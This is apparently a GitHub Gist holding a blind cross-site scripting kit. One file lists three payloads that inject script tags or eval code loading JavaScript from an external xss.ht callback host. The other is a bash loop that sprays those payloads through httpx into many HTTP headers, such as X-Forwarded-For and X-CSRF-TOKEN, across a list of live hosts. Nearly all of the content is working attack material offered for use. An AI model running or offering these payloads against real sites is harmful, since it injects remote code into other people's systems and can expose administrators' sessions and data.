Created
August 1, 2022 13:40
-
-
Save Huntinex/0073f69d4d021bbd8d2c06c68c49a2b3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"><script src=https://username.xss.ht></script> | |
'><script src=https://username.xss.ht></script> | |
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while read bxss;do | |
cat alivehosts.txt | httpx \ | |
-H "X-Forwarded-for: $bxss" -H "X-forwarded-ip: $bxss" -H "cf-connecting-ip: $bxss" | |
cat alivehosts.txt | httpx \ | |
-H "X-Client-ip: $bxss" -H "X-real-ip: $bxss" -H "X-request-uri: $bxss" \ | |
-H "X-XSRF-TOKEN: $bxss" -H "X-CSRF-TOKEN: $bxss" | |
done < bxss-payload.txt |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment